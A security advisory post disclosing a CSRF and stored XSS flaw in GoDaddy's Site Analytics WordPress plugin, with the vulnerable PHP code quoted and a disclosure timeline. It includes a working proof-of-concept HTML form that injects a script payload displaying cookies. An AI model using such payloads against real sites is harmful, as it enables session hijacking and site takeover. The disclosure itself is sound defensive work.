18 Oct

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Site Analytics Plugin

We recently found that the Site Analytics Plugin contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s setting pages, /wp-admin/plugins.php?page=siteanalytics.php.

The CSRF potion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings.

For the XSS issue, in the file /siteanalytics.php starting at line 37 in version 1.4.3 settings are saved and there is no sanitization done:

if ( isset( $_POST['Save'] )) {
	if ( isset( $_POST['saScript'] ) && !empty( $_POST['saScript'] )) {
		$script = $_POST['saScript'];
		if ( $script[0] == '<' )
			delete_option( 'sa_script' );
			add_option( 'sa_script', $script, '', 'yes' );

When the value is outputted on the page through the same file they are not escaped, the value is set here:

$script = stripslashes( get_option( 'sa_script' ));

And then output here:

'               <tr><td><textarea name="saScript" rows="15" cols="100">'.$script.'</textarea></td></tr>'.

The developer of the plugin is GoDaddy, a major web hosting company. More than a week ago we left a message on the support forum for another of their other plugins, which we also found a vulnerability in, asking how we could get in touch with them privately to notify them of the details of the vulnerabilities in the plugins, but they haven’t responded.

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page. This will occur right after you hit the Submit button when using the Firefox web browser. Other major web browser have XSS filtering, so it will only be shown if you return to/wp-admin/plugins.php?page=siteanalytics.php after having submitted it.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form method="post" action="http://[path to WordPress]/wp-admin/plugins.php?page=siteanalytics.php">
<input type="hidden" name="saScript" value='</textarea><script>alert(document.cookie);</script>' />
<input type="submit" name="Save" value="Submit" />


  • 10/10/2016 – Contacted developer publicly to see how we could privately notify them of the issue.
  • 10/18/2016 – WordPress.org Plugin Directory notified.
  • 10/19/2016 – Plugin removed from WordPress.org Plugin Directory.

Leave a Reply

Your email address will not be published. Required fields are marked *